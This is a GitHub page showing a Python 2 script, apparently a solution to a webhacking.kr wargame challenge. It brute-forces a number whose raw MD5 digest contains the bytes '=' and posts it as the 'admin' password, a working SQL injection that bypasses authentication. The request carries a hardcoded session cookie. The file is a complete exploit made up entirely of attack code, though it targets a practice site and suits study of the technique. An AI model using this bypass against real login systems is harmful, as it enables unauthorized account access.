-
Notifications
You must be signed in to change notification settings - Fork 0
/
Challenge51.py
37 lines (33 loc) · 963 Bytes
/
Challenge51.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#-*- coding: utf-8 -*-
import urllib
import urllib2
import hashlib
import CookieManager
print "[+] Find MD5 Vulnerable Value"
plaintext = 0
while True:
if hashlib.md5(str(plaintext)).digest().find("'='") > 0:
break
plaintext += 1
print "[!]", str(plaintext)
print
print "[+] SQL Injection"
challengeUrl = "http://webhacking.kr/challenge/bonus/bonus-13/index.php"
parameters = urllib.urlencode({
"id": "admin",
"pw": str(plaintext)
})
CookieManager.addCookie("PHPSESSID", "73ea5f35f558006f21f6185c171a2ed9")
httpRequest = urllib2.Request(challengeUrl, parameters)
httpRequest.add_header("Cookie", CookieManager.getCookie())
httpRequest.get_method = lambda: "POST"
httpConnection = None
try:
httpConnection = urllib2.urlopen(httpRequest)
httpResponse = httpConnection.read()
print httpResponse
except:
raise
finally:
if httpConnection != None:
httpConnection.close()